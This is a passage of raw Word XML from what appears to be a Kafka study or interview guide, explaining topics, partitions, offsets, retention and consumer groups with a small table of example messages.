          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6AFDB3" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1284"/>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Analytics app (tracks engagement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993AB4C" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1284"/>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Security app (monitors suspicious activity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F5255" w14:textId="30AC7A48" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689" w:rsidP="00E51096">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A66AE8" w14:textId="77777777" w:rsidR="00612689" w:rsidRPr="00E51096" w:rsidRDefault="00612689"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Let me know if you want a visual of topics, partitions, or an example with producers and consumers using Java Spring Boot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658F3B42" w14:textId="06F4FAC5" w:rsidR="00612689" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0061268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3DBEBE1">
          <v:rect id="_x0000_i3086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2959BCF2" w14:textId="67EE3E95" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="007C61B8" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="769" w:name="_Toc196308249"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka topics and how data is stored in topics and consumed by consumers?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="769"/>
    </w:p>
    <w:p w14:paraId="479514C2" w14:textId="364844F1" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E51096" w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is like a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>category/feed name</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to which data is published by producers and from which consumers read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A3470" w14:textId="77777777" w:rsidR="00D93542"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4A3005D9">
          <v:rect id="_x0000_i3087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA7DFC" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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How Data is Stored in Kafka Topics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D500976" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1285"/>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Topic Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5287B055" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1285"/>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Each topic is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>split into partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Topic orders can have 3 partitions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A849D1F" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1285"/>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Partitions enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C8BDA" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1285"/>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Data in each partition is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ordered</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DDD8A8" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1285"/>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Offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD49D3" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1285"/>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Each message in a partition has a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like a line number).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6995DE3E" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1285"/>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Kafka stores messages </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>persistently</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357BF260" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1285"/>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Offsets help consumers </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>track what they’ve read</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E1E65" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1285"/>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Retention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0FA83" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1285"/>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Messages are retained for a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configurable duration</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., 7 days), regardless of consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8723C5" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1285"/>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You can also configure size-based retention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E740E8A" w14:textId="77777777" w:rsidR="00D93542"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F5D264E">
          <v:rect id="_x0000_i3088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="655E9308" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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Example: How Data is Stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B7E02" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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Let’s say we publish 5 messages to topic user-activity with 2 parti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0"/>
        <w:gridCol w:w="1872"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="400A81FB" w14:textId="77777777" w:rsidTr="00D93542">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D5E0658" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Partition 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B261BEF" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Partition 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="72A3326D" w14:textId="77777777" w:rsidTr="00D93542">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E295212" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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offset 0 → login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="423E7F37" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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offset 0 → click</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="7B0A1ACE" w14:textId="77777777" w:rsidTr="00D93542">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D26A71" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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offset 1 → logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="184A7228" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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offset 1 → purchase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="1C281424" w14:textId="77777777" w:rsidTr="00D93542">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DB34C78" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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offset 2 → scroll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72896657" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4899585C" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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Kafka stores this data on disk in a binary format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF8C80" w14:textId="77777777" w:rsidR="00D93542"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3935B53">
          <v:rect id="_x0000_i3089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="441DE47D" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542"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How Consumers Consume Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D36F05" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>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Consumer Group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F56E3F7" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>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Consumers are grouped (e.g., user-activity-group).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537449B4" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>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Kafka assigns </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one partition to one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a group (load balancing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6977" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>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Consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6C35C" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>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Consumer reads from assigned partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1850E" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>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Keeps track of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>last committed offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A1B63" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>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Can </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>re-read messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a specific offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197992BD" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>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Offset Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF141B" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>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Auto commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB33988" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1286"/>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Offset is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>per consumer group per partition</w:t>
      </w:r>
